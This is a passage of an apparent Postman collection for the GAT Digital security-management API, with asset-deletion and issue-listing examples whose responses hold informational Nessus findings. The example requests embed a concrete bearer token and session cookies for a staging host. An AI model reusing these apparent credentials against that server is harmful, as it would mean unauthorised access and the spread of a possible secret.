server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0b06qx2dym2hx1cczjp3xwmvhx3763.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"900a6f76-d52f-4fe4-8711-f03d04285006","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"deleted\": 1,\n    \"not_deleted\": 1,\n    \"not_deleted_details\": [\n        {\n            \"short_msg\": \"Unable to delete Asset.\",\n            \"long_msg\": \"Invalid id\",\n            \"asset_id\": \"5ab9178ee12f5e0570000000\"\n        }\n    ]\n}"},{"id":"e0f44c7a-4a53-4f1f-81c3-5be6c778ca87","name":"Malformed Request Body","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": \"5ca4fc4ec569d523f821c7ad\"\n}"},"url":"https://homolog.gat.digital/api/v1/assets"},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Mon, 17 Jun 2019 17:24:55 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0b06qx2dym2hx1cczjp3xwmvhx3763.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01mwshbqrty82o154tfnnm3koyu3784.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5b490c09-e54c-4e16-a6dc-b3155be32b0a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01mwshbqrty82o154tfnnm3koyu3784.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5b490c09-e54c-4e16-a6dc-b3155be32b0a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"2292d4bd-3548-4321-b43d-d61c492c270a","name":"Delete two Assets","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5ab9178ee12f5e05704b903d\", \"5ca4fc4ec569d523f821c7ad\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/assets"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:17:03 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0zi654ji1b4izijj7v5zm469i3563.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01b35o9yzi480xhq5iiepsw5e23608.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=62a398dc-fc4a-4d62-8e61-4e4e8b5937c6;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01b35o9yzi480xhq5iiepsw5e23608.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"62a398dc-fc4a-4d62-8e61-4e4e8b5937c6","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"deleted\":2,\"deleted_ids\":[\"5ab9178ee12f5e05704b903d\",\"5ca4fc4ec569d523f821c7ad\"],\"not_deleted\":0}"}],"_postman_id":"cc179932-8cb3-4924-9365-13a3eaedb5bb"}],"id":"3c386811-178c-4031-9fac-af19d8b71091","description":"<p>O GAT se diferencia da maioria das demais soluções permitindo a visão e o gerenciamento da segurança de diversos tipos de Ativos. Atualmente, o GAT trabalha com os seguintes tipos de Ativos:</p>\n<ul>\n<li>Host (baseado no endereço IP)</li>\n<li>Aplicação (baseado na URL)</li>\n<li>Pessoa (baseado no endereço de email)</li>\n<li>Empresa</li>\n<li>Processo</li>\n<li>Cloud</li>\n</ul>\n<p>Uma boa gestão de Ativos é essencial para ter uma visão clara sobre seu risco cibernético.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"a6b36c9a-e905-4440-921e-f8bf10ff580a"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"6cabefd1-0e3a-4409-ad68-729f863e4a86"}}],"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091"},{"name":"Apontamentos","item":[{"name":"Issues","id":"1eb08383-39ed-492e-8f9a-bfc8d6dec263","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/issues?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Issues on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Issues on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"49b34b22-c976-4146-9598-83d2c7c4ab72","id":"49b34b22-c976-4146-9598-83d2c7c4ab72","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","issues"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"62e265f8-a065-48ec-a86e-4b2da0aa817d","name":"Get the first 30 Issues","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":{"raw":"https://subdomain.gat.digital/api/v1/issues?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","issues"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"The mime type of this content","type":"text"},{"key":"Date","value":"Mon, 17 Jun 2019 17:58:53 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node016qw9512nrcy2jx6qihwng4vu4253.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=527d4d3f-058d-43f7-b723-fac55f0cfd88;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node016qw9512nrcy2jx6qihwng4vu4253.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"527d4d3f-058d-43f7-b723-fac55f0cfd88","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"language\": \"en\",\n            \"title\": \"OS Identification\",\n            \"description\": \"\\nUsing a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cb\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7d2\",\n            \"id_gat_detail\": 2685,\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:40:12\",\n            \"last_seen_date\": \"2017-09-18T03:40:12\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Nessus SYN scanner\",\n            \"description\": \"\\nThis plugin is a SYN 'half-open' port scanner.  It shall be reasonably quick even against a firewalled target. \\n\\nNote that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d4\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab9178fe12f5e05704b907e\"\n            ],\n            \"categories\": [\n                \"5b4f3069e12f5edae60d25dd\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7d0\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:15\",\n            \"last_seen_date\": \"2017-09-18T03:29:15\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Web Server robots.txt Information Disclosure\",\n            \"description\": \"\\nThe remote host contains a file named 'robots.txt' that is intended to prevent web 'robots' from visiting certain directories in a website for maintenance or indexing purposes.  A malicious user may also be able to use the contents of this file to learn of sensitive documents or directories on the affected site and either retrieve them directly or target them for other attacks.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cc\",\n            \"port\": 8080,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab91796e12f5e05704b9929\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"http://www.robotstxt.org/wc/exclusion.html\",\n                    \"title\": \"www.robotstxt.org\"\n                }\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7ce\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:59:06\",\n            \"last_seen_date\": \"2017-09-18T03:59:06\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Service Detection\",\n            \"description\": \"\\nNessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c8\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7cc\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:28:06\",\n            \"last_seen_date\": \"2017-09-18T03:28:06\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Host Fully Qualified Domain Name (FQDN) Resolution\",\n            \"description\": \"\\nNessus was able to resolve the fully qualified domain name (FQDN) of the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d3\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7ca\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:36:35\",\n            \"last_seen_date\": \"2017-09-18T03:36:35\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"HyperText Transfer Protocol (HTTP) Information\",\n            \"description\": \"\\nThis test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... \\n\\nThis test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cc\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7c8\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:59:06\",\n            \"last_seen_date\": \"2017-09-18T03:59:06\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Service Detection\",\n            \"description\": \"\\nNessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4ce\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7c6\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:47:10\",\n            \"last_seen_date\": \"2017-09-18T03:47:10\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Nessus SYN scanner\",\n            \"description\": \"\\nThis plugin is a SYN 'half-open' port scanner.  It shall be reasonably quick even against a firewalled target. \\n\\nNote that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4ce\",\n            \"port\": 8080,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab9178fe12f5e05704b907e\"\n            ],\n            \"categories\": [\n                \"5b4f3069e12f5edae60d25dd\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7c4\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:47:10\",\n            \"last_seen_date\": \"2017-09-18T03:47:10\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Nessus Scan Information\",\n            \"description\": \"\\nThis plugin displays, for each tested host, information about the scan itself :\\n\\n  - The version of the plugin set.\\n  - The type of scanner (Nessus or Nessus Home).\\n  - The version of the Nessus Engine.\\n  - The port scanner(s) used.\\n  - The port range scanned.\\n  - Whether credentialed or third-party patch management     checks are possible.\\n  - The date of the scan.\\n  - The duration of the scan.\\n  - The number of hosts scanned in parallel.\\n  - The number of checks done in parallel.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d0\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b436789e12f5e057c3a88bd\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7c2\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:27:40\",\n            \"last_seen_date\": \"2017-09-18T03:27:40\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Backported Security Patch Detection (SSH)\",\n            \"description\": \"\\nSecurity patches may have been 'backported' to the remote SSH server without changing its version number. \\n\\nBanner-based checks have been disabled to avoid false positives. \\n\\nNote that this test is informational only and does not denote any security problem.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d2\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://access.redhat.com/security/updates/backporting/?sc_cid=3093\",\n                    \"title\": \"access.redhat.com\"\n                }\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7c0\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:36:51\",\n            \"last_seen_date\": \"2017-09-18T03:36:51\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"SSH Protocol Versions Supported\",\n            \"description\": \"\\nThis plugin determines the versions of the SSH protocol supported by the remote SSH daemon.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d4\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7be\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:15\",\n            \"last_seen_date\": \"2017-09-18T03:29:15\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Host Fully Qualified Domain Name (FQDN) Resolution\",\n            \"description\": \"\\nNessus was able to resolve the fully qualified domain name (FQDN) of the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c6\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7bc\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:35:44\",\n            \"last_seen_date\": \"2017-09-18T03:35:44\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Traceroute Information\",\n            \"description\": \"\\nMakes a traceroute to the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d3\",\n            \"port\": 0,\n            \"protocol\": \"udp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7ba\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:36:35\",\n            \"last_seen_date\": \"2017-09-18T03:36:35\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"HTTP Reverse Proxy Detection\",\n            \"description\": \"\\nThis web server is reachable through a reverse HTTP proxy.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c6\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"cves\": [\n                \"5ab91798e12f5e05704b993b\",\n                \"5ab9178fe12f5e05704b90a4\"\n            ],\n            \"cwes\": [\n                \"5ab91798e12f5e05704b993b\",\n                \"5ab9178fe12f5e05704b90a4\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7b8\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:35:44\",\n            \"last_seen_date\": \"2017-09-18T03:35:44\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"SSH Weak MAC Algorithms Enabled\",\n            \"description\": \"\\nThe remote SSH server is configured to allow either MD5 or 96-bit MAC algorithms, both of which are considered weak.\\n\\nNote that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.\",\n            \"severity\": 1,\n            \"asset\": \"5d03b90cc569d5025016e4ca\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"recommendation\": [\n                \"5ab9178fe12f5e05704b9079\"\n            ],\n            \"categories\": [\n                \"5b17d91de12f5e057c39caba\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7b6\",\n            \"cvss_v3_score\": 2.2211673,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:29:28\",\n            \"last_seen_date\": \"2017-09-18T03:29:28\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Service Detection\",\n            \"description\": \"\\nNessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cb\",\n            \"port\": 22,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39cac7\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7b4\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:40:12\",\n            \"last_seen_date\": \"2017-09-18T03:40:12\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"HTTP Server Type and Version\",\n            \"description\": \"\\nThis plugin attempts to determine the type and the version of the   remote web server.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c7\",\n            \"port\": 80,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7b2\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:27:33\",\n            \"last_seen_date\": \"2017-09-18T03:27:33\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Traceroute Information\",\n            \"description\": \"\\nMakes a traceroute to the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4c6\",\n            \"port\": 0,\n            \"protocol\": \"udp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7b0\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:35:44\",\n            \"last_seen_date\": \"2017-09-18T03:35:44\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Device Type\",\n            \"description\": \"\\nBased on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc).\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4d1\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7ae\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:35:49\",\n            \"last_seen_date\": \"2017-09-18T03:35:49\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Host Fully Qualified Domain Name (FQDN) Resolution\",\n            \"description\": \"\\nNessus was able to resolve the fully qualified domain name (FQDN) of the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4cd\",\n            \"port\": 0,\n            \"protocol\": \"tcp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                \"5b48a6fee12f5edae60cf6e6\"\n            ],\n            \"issue_id\": \"5d03b910c569d5025016e7ac\",\n            \"cvss_v3_score\": 0,\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"creation_date\": \"2017-09-18T03:28:08\",\n            \"last_seen_date\": \"2017-09-18T03:28:08\"\n        },\n        {\n            \"language\": \"en\",\n            \"title\": \"Traceroute Information\",\n            \"description\": \"\\nMakes a traceroute to the remote host.\",\n            \"severity\": 0,\n            \"asset\": \"5d03b90cc569d5025016e4ca\",\n            \"port\": 0,\n            \"protocol\": \"udp\",\n            \"status\": \"PENDING\",\n            \"categories\": [\n                